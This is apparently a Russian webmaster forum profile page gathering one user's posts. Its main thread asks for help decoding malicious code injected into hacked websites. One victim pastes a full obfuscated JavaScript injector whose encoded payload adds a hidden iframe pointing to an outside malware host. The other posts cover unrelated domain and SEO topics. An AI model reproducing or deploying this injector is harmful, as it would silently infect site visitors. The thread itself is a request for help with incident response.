silverspam

silverspam
Рейтинг
37
Регистрация
02.09.2010
Помогите расшифровать
WhiteSmartFox:


WhiteSmartFox добавил 18-01-2011 в 14:46

В 99% это взлом фтп и виноваты вирусы на вашем личном компе.

WhiteSmartFox добавил 18-01-2011 в 14:47

Это ничего не значит такие вирусы могут поменять дату изменений, потом как правило воруют пароли из фтп менеджера, а вставляют код уже со спец. серверов.

WhiteSmartFox добавил 18-01-2011 в 14:49

Копируйте все файлы с хостинга, ищите строчку 'script' и смотрите допустимые там скрипты, в базе скорее всего чисто, слишком сложно заражать базу.

WhiteSmartFox добавил 18-01-2011 в 14:50

Проверяйте вирусы на своем компе, почти гарантировано были украдены пароли от фтп. Кстати все пароли поменяйте обязательно.

Откуда могли быть украдены пароли? FTP клиентом не пользуюсь совсем (последний раз где-то в мае 2010). Если честно я и сам не знаю пароля на ftp хостинга, хотя предполагаю что он такой же как и на сам аккаунт на хостинге.

В любом случае спасибо за советы Ваши. Буду дальше думать.

Помогите расшифровать

И как теперь проверить наличие этой дряни? Обновился по бекапу, обновляю страничку вроде ничего не вылазит. А вдруг не исчезла?

Еще на мауле высказали версию, что дрянь может в картинках сидеть, в том числе которые задействованы в оформлении шаблона.

Помогите расшифровать

перерыл все файлы. Последние изменения в файлах на хостинге датированы 28.11.10, а беда началась когда-то в последние два дня.

Из-за хостинга может быть такое? Каким образом?

И еще интересно было бы узнать какой хостинг у ТС :)

Помогите расшифровать
ahead:
У меня комментов не было никаких...

Может хостинг виноват? У меня траст-хост хостинг, а у Вас какой?

И у меня он же...Надо долбить их ТП значит.

Помогите расшифровать

Сегодня тоже обнаружил подобный код. Уже даже антивирус начал на мой сайт реагировать :( Все обыскал не знаю где найти заразу.

До этого заметил что какой-то странный коммент с "левой" кодировкой постоянно приходил на модерацию, я его замучался в спам лист кидать.

Вот код с моего сайта: 

<script language="javascript" type="text/javascript">function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var dlul={eya:5111,zn:function(){createCSS("#c0","background: url(data:,eva)");var zv=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){var tfq=r.cssRules||r.rules;for(var smgl=0;smgl<tfq.length;smgl++){var fb=tfq.item?tfq.item(smgl):tfq[smgl];if(!fb.selectorText.match(/#c(\d+)/))continue;zv=fb.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};}

var jqt=[5102,5102,5006,5009,5079,5071,5011,5000,5012,4994,5002,5010,5001,4995,5065,5008,5010,4995,5042,5003,5010,5002,5010,5001,4995,4996,5045,4990,5027,5014,5008,5033,5014,5002,5010,5071,5072,5013,5000,5011,4990,5072,5070,5020,5063,5018,5070,4988,5098,5102,5102,5102,5006,5009,4997,5014,5002,5010,4997,5071,5070,5052,5098,5102,5102,4986,5079,5010,5003,4996,5010,5079,4988,5098,5102,5102,5102,4993,5014,4997,5079,5013,5011,4990,5079,5050,5079,5011,5000,5012,4994,5002,5010,5001,4995,5065,5012,4997,5010,5014,4995,5010,5042,5003,5010,5002,5010,5001,4995,5071,5077,5013,5000,5011,4990,5077,5070,5052,5098,5102,5102,5102,4995,4997,4990,5079,4988,5098,5102,5102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,5014,4999,4999,5010,5001,5011,5044,5007,5006,5003,5011,5071,5013,5011,4990,5070,5052,5098,5102,5102,5102,4986,5079,5012,5014,4995,5012,5007,5079,5071,5010,5070,5079,4988,5098,5102,5102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,5013,5000,5011,4990,5079,5050,5079,5013,5011,4990,5052,5098,5102,5102,5102,4986,5098,5102,5102,5102,5006,5009,5079,5071,5011,5000,5012,4994,5002,5010,5001,4995,5065,5008,5010,4995,5042,5003,5010,5002,5010,5001,4995,4996,5045,4990,5027,5014,5008,5033,5014,5002,5010,5071,5072,5013,5000,5011,4990,5072,5070,5020,5063,5018,5070,4988,5098,5102,5102,5102,5102,5006,5009,4997,5014,5002,5010,4997,5071,5070,5052,5098,5102,5102,5102,4986,5079,5010,5003,4996,5010,5079,4988,5098,5102,5102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,4992,4997,5006,4995,5010,5071,5077,5051,5006,5009,4997,5014,5002,5010,5079,4996,4997,5012,5050,5072,5007,4995,4995,4999,5053,5064,5064,4999,5006,5012,5007,5010,4995,5014,5065,5001,5010,4995,5064,5002,5014,5006,5001,5065,4999,5007,4999,5072,5079,4992,5006,5011,4995,5007,5050,5072,5062,5063,5072,5079,5007,5010,5006,5008,5007,4995,5050,5072,5062,5063,5072,5079,4996,4995,4990,5003,5010,5050,5072,4993,5006,4996,5006,5013,5006,5003,5006,4995,4990,5053,5007,5006,5011,5011,5010,5001,5052,4999,5000,4996,5006,4995,5006,5000,5001,5053,5014,5013,4996,5000,5003,4994,4995,5010,5052,5003,5010,5009,4995,5053,5063,5052,4995,5000,4999,5053,5063,5052,5072,5049,5051,5064,5006,5009,4997,5014,5002,5010,5049,5077,5070,5052,5098,5102,5102,5102,4986,5098,5102,5102,4986,5098,5102,5102,5009,4994,5001,5012,4995,5006,5000,5001,5079,5006,5009,4997,5014,5002,5010,4997,5071,5070,4988,5098,5102,5102,5102,4993,5014,4997,5079,5009,5079,5050,5079,5011,5000,5012,4994,5002,5010,5001,4995,5065,5012,4997,5010,5014,4995,5010,5042,5003,5010,5002,5010,5001,4995,5071,5072,5006,5009,4997,5014,5002,5010,5072,5070,5052,5009,5065,4996,5010,4995,5046,4995,4995,4997,5006,5013,4994,4995,5010,5071,5072,4996,4997,5012,5072,5067,5072,5007,4995,4995,4999,5053,5064,5064,4999,5006,5012,5007,5010,4995,5014,5065,5001,5010,4995,5064,5002,5014,5006,5001,5065,4999,5007,4999,5072,5070,5052,5009,5065,4996,4995,4990,5003,5010,5065,4993,5006,4996,5006,5013,5006,5003,5006,4995,4990,5050,5072,5007,5006,5011,5011,5010,5001,5072,5052,5009,5065,4996,4995,4990,5003,5010,5065,4999,5000,4996,5006,4995,5006,5000,5001,5050,5072,5014,5013,4996,5000,5003,4994,4995,5010,5072,5052,5009,5065,4996,4995,4990,5003,5010,5065,5003,5010,5009,4995,5050,5072,5063,5072,5052,5009,5065,4996,4995,4990,5003,5010,5065,4995,5000,4999,5050,5072,5063,5072,5052,5009,5065,4996,5010,4995,5046,4995,4995,4997,5006,5013,4994,4995,5010,5071,5072,4992,5006,5011,4995,5007,5072,5067,5072,5062,5063,5072,5070,5052,5009,5065,4996,5010,4995,5046,4995,4995,4997,5006,5013,4994,4995,5010,5071,5072,5007,5010,5006,5008,5007,4995,5072,5067,5072,5062,5063,5072,5070,5052,5098,5102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,5008,5010,4995,5042,5003,5010,5002,5010,5001,4995,4996,5045,4990,5027,5014,5008,5033,5014,5002,5010,5071,5072,5013,5000,5011,4990,5072,5070,5020,5063,5018,5065,5014,4999,4999,5010,5001,5011,5044,5007,5006,5003,5011,5071,5009,5070,5052,5098,5102,5102,4986];var s="";dv=eval(zv+"l");uw=String.fromCharCode;for(var i=0;i<jqt.length;i++){sfh=dlul.eya-parseInt(jqt);s+=(uw(sfh));}

dv(s);}};dlul.zn();</script>
Куда катится зона .рф? Только факты.
Showme:
Что такое "ашманов", если не секрет? Без сарказма.

Вероятно сайт аудитор от ашманова имеется ввиду :)

Продам игровой сайт

Если не сложно киньте в личку пароль от статы.

SEO софт со скидкой

Купил Цербера через REGNET. Доволен как слон :)

Платник с фильмами продам

А от нынешних посетителей толк есть?

Или только лить трафик туда отдельно?

Нужен хостинг для .рф

Очень неудобно, если будет висеть 10-15 папкой таких с "непонятным" названием...Придется составлять список соответствия кириллического домена своему punycode чтобы удобнее было.

У меня пока-что так 5 доменов висит, их уже запомнил так на память.

1234 5
Всего: 42